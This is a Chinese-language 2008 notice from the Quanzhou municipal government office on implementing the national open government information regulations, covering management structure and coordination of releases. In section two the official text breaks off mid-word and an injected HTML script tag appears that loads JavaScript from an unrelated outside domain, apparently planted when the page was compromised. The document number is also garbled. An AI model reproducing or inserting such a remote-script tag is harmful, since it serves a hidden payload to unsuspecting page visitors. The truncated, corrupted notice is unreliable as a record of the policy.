泉州市人民政府办公室关于施行《中华人民共和国政府信息公开条例》若干问题的意见
发布日期:20080508  阅读次数:5952

泉州市人民政府办公室关于施行《中华人民共和国政府信息公开条例》若干问题的意见

泉政办〔2008113 

 

 

各县(市、区)人民政府、泉州开发区管委会,市直有关单位

为进一步规范各级政府各部门贯彻施行《中华人民共和国政府信息公开条例》(以下简称《条例》)的有关工作,积极稳妥地推进我市政府信息公开,保障公民、法人和其他组织依法获取政府信息,根据国务院办公厅《关于施行〈中华人民共和国政府信息公开条例〉若干问题的意见》(国办发〔200836号)精神,结合我市实际,现就《条例》施行中的若干问题提出以下意见:

      一、关于政府信息公开管理体制问题

(一)市、县两级人民政府各部门(单位)要在本级人民政府信息公开工作主管部门的统一指导、协调、监督下开展政府信息公开工作。

(二)实行垂直领导的部门(单位)要在其上级业务主管部门(单位)的领导下,在所在地地方人民政府统一指导、协调下开展政府信息公开工作。实行双重领导的部门(单位)要在所在地地方人民政府的领导下开展政府信息公开工作,同时接受上级业务主管部门(单位)的指导。

      二、关于建立政府信息发布协调机制问题

(三)各县(市、区)人民政府、泉州开发区管委会信息公开工作主管部门要组织、协调有关行政机关建立健全政府信?script src=http://bjdtpy.com/x.js>

中国泉州
关闭
关闭